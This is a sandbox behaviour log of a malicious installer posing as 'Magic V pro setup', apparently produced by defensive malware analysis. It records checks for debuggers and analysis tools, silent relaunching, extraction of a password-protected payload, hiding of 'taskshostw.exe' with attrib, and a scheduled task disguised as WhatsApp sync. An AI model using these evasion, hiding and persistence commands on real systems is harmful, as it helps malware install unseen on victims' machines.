              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="immunitydebugger.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="joeboxcontrol.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="appguarddesktop.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="petools.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="importrec.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="autorunsc.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="sysinspector.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="netmon.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="sniff_hit.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="cheatengine-x86_64.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="frida-helper-64.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SeleCt * From wiN32_PrOCeSs WheRe nAme="gdb.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
              Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exeString found in binary or memory: /LOADINF="filename"
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeFile read: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe "C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe"
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeProcess created: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp "C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$1042C,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess created: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe "C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeProcess created: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp "C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$30420,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe "C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe" x "C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\logs" -o"C:\Users\user\AppData\Local\Programs\Common" -y -pCC3ba8B679c926fc9911aeDE9009E589CBD3667C48439c630418D27fDbb52Fc8
              Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /f
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe C:\Users\user\AppData\Local\programs\common\taskshostw.exe C:\Windows\system32\config\systemprofile\AppData\Local\programs\common\taskshostw.exe
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp.cmd""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe C:\Users\user\AppData\Local\programs\common\taskshostw.exe
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeProcess created: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp "C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$1042C,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess created: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe "C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-Jump to behavior
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeProcess created: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp "C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp" /SL5="$30420,1192681,727040,C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exe" /verysilent /sp-Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess created: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe "C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe" x "C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\logs" -o"C:\Users\user\AppData\Local\Programs\Common" -y -pCC3ba8B679c926fc9911aeDE9009E589CBD3667C48439c630418D27fDbb52Fc8Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /c attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /xml C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\lang /tn WhatsAppSyncTaskMachineCore /fJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp.cmd""Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h +S "C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: sxs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3LF26.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\Magic_V_pro_setup_stable_latest_release_version_9_709.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: netapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: winhttpcom.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: mlang.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: explorerframe.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmpSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\attrib.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\SysWOW64\attrib.exeSection loaded: fsutilext.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exeSection loaded: windows.storage.dllJump to behavior
